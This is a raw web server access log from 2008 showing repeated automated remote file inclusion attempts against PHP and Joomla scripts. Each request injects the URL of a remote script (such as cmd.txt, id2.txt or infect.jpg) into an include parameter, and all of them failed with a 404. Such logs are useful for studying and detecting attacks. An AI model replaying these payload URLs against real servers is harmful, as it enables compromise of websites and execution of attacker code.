207.44.238.63 - - [25/Mar/2008:08:48:11 -0700] "GET /logs/access_080215.log//login.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:48:12 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:48:12 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:48:12 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:48:12 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:48:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:48:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:48:12 -0700] "GET //login.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:48:12 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.4.88.40 - - [25/Mar/2008:08:48:20 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
81.4.88.40 - - [25/Mar/2008:08:48:20 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
72.232.251.10 - - [25/Mar/2008:08:48:22 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.revistaeducando.com.br/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:08:48:23 -0700] "GET /logs//login.php?dir=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:48:26 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:48:26 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:08:48:38 -0700] "GET ///tags.php?BBCodeFile=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
189.26.87.181 - - [25/Mar/2008:08:48:43 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://d34drbt.110mb.com/files/cmds/id.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:48:57 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:49:00 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:49:05 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:49:10 -0700] "GET /logs/access_071231.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:49:23 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:49:24 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:49:27 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.15.129.115 - - [25/Mar/2008:08:49:29 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:49:40 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:49:58 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.209.45 - - [25/Mar/2008:08:49:58 -0700] "GET /logs/access_071231.log/protection.php?action=logout&siteurl=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:50:13 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:08:50:15 -0700] "GET /logs/access_080312.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:08:50:15 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
81.23.229.105 - - [25/Mar/2008:08:50:15 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.88.85.83 - - [25/Mar/2008:08:50:32 -0700] "GET /logs/access_080127.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:50:39 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:50:44 -0700] "GET /logs/access_080306.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:08:50:54 -0700] "GET /logs/access_080306.log///tags.php?BBCodeFile=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:08:50:54 -0700] "GET ///tags.php?BBCodeFile=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:08:50:54 -0700] "GET /logs///tags.php?BBCodeFile=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
72.232.251.10 - - [25/Mar/2008:08:51:02 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.revistaeducando.com.br/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.4.234.2 - - [25/Mar/2008:08:51:12 -0700] "GET /logs/access_080215.log///tags.php?BBCodeFile=http://www.lirik.biz//skins/bobbyzhuo/.debug/id1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:51:34 -0700] "GET /main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:51:43 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [25/Mar/2008:08:51:43 -0700] "GET //errors.php?error=http://www.asoc-posidonia.es/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:51:50 -0700] "GET /logs/access_080219.log/newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:51:50 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:51:51 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [25/Mar/2008:08:52:01 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [25/Mar/2008:08:52:01 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
75.126.36.234 - - [25/Mar/2008:08:52:01 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.91.249.193 - - [25/Mar/2008:08:52:08 -0700] "GET /logs//errors.php?error=http://www.asoc-posidonia.es/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:08:52:15 -0700] "GET /logs/access.log/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:08:52:16 -0700] "GET /index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.99.2.85 - - [25/Mar/2008:08:52:22 -0700] "GET /logs/index.php?body=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:52:23 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:52:23 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:52:24 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:52:30 -0700] "GET /errors.php?error=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:52:30 -0700] "GET /logs/errors.php?error=http://www.velvetclassic.net/b.txt?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
65.91.249.193 - - [25/Mar/2008:08:52:30 -0700] "GET /logs/access_080218.log//errors.php?error=http://www.asoc-posidonia.es/pr.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:52:35 -0700] "GET /logs/access_080118.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:52:36 -0700] "GET //components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:52:36 -0700] "GET /logs//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:53:06 -0700] "GET /logs/access_080117.log//login.php?dir=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:53:24 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:53:31 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:53:31 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.129.206.145 - - [25/Mar/2008:08:53:34 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://prepaidcard.net/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:08:53:44 -0700] "GET /logs/access_080306.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:54:10 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.129.206.145 - - [25/Mar/2008:08:54:16 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://prepaidcard.net/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:08:55:03 -0700] "GET /logs/access_080306.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:08:55:03 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
60.249.45.142 - - [25/Mar/2008:08:55:41 -0700] "GET /logs/access_080219.log//include.php?path[docroot]=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [25/Mar/2008:08:55:42 -0700] "GET //include.php?path[docroot]=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
60.249.42.221 - - [25/Mar/2008:08:55:43 -0700] "GET /logs//include.php?path[docroot]=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:56:18 -0700] "GET /logs/access_080216.log/main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:56:19 -0700] "GET /logs/main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:56:23 -0700] "GET /logs/access_080127.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:56:23 -0700] "GET /logs//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.129.206.145 - - [25/Mar/2008:08:56:37 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://prepaidcard.net/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.225.216.125 - - [25/Mar/2008:08:56:41 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
66.225.216.125 - - [25/Mar/2008:08:56:41 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:56:42 -0700] "GET /logs/access_080213.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.58.131.61 - - [25/Mar/2008:08:56:54 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.237.161.209 - - [25/Mar/2008:08:57:13 -0700] "GET /logs/access_080213.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
207.58.131.61 - - [25/Mar/2008:08:57:19 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.131.61 - - [25/Mar/2008:08:57:20 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.131.61 - - [25/Mar/2008:08:57:20 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:57:21 -0700] "GET /logs/access_080219.log/newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:57:21 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:57:21 -0700] "GET /logs/newspublish/include.php?path%5Bdocroot%5D=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:57:27 -0700] "GET /logs/access_080207.log//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:57:27 -0700] "GET //Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:57:27 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.225.216.125 - - [25/Mar/2008:08:57:28 -0700] "GET /phphtml.php?htmlclass_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
66.225.216.125 - - [25/Mar/2008:08:57:28 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:57:54 -0700] "GET /logs/access_080119.log//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:57:58 -0700] "GET /logs/access_080312.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:57:58 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:57:58 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.203.99.136 - - [25/Mar/2008:08:58:02 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.203.99.136 - - [25/Mar/2008:08:58:03 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.my-sl.com//modules/TotalCalendar/lib/allyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:58:11 -0700] "GET /logs/access_080120.log//administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.164.242.195 - - [25/Mar/2008:08:58:18 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [25/Mar/2008:08:58:27 -0700] "GET /logs/access_080128.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [25/Mar/2008:08:58:28 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.164.242.195 - - [25/Mar/2008:08:58:28 -0700] "GET /logs//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.166.152.66 - - [25/Mar/2008:08:58:38 -0700] "GET //com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.xfactor.altervista.org/php5/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:08:58:40 -0700] "GET /logs/access_080215.log/page.php?doc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:08:58:40 -0700] "GET /page.php?doc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.10.73 - - [25/Mar/2008:08:58:40 -0700] "GET /logs/page.php?doc=ftp://84.32.137.157/incoming/upload/trem/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:58:44 -0700] "GET /logs/access_080207.log//Neos_Chronos/header.php?base_folder=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
